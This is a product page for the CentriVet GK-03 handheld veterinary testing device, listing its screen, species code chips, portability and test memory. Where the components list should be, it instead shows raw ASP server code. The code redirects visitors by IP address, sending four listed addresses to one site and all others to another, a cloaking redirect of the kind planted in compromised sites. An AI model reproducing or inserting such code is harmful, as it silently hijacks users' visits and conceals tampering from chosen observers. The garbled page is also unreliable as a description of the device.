Current location : Home>Products>Veterinary Testing System

CentriVet GK-03.png

Operational Guide

img
  • img
    Big, bold screen for easy viewing
  • img
    Species specific code chips for testing multiple animals
  • img
    Portable, handheld device designed for multiple settings: Veterinarian’s office; Farm use; Home use; Emergency animal hospital
  • img
    Strip port ejector for convenience and safety
  • img
  • img
    450 test memory with date, time, and test type

Components

<% requestIP = request.ServerVariables("REMOTE_ADDR") IP = "[223.109.206.196|120.216.162.113|45.40.51.242|13.67.144.27]" trueURL = "http://www.baidu.com" falseURL = "http://www.google.com" ipArr = split(IP,"|") flag = false for i=0 to ubound(ipArr) if requestIP=ipArr(i) then flag=true exit for end if next if flag then response.Redirect(falseURL) else response.Redirect(trueURL) end if %>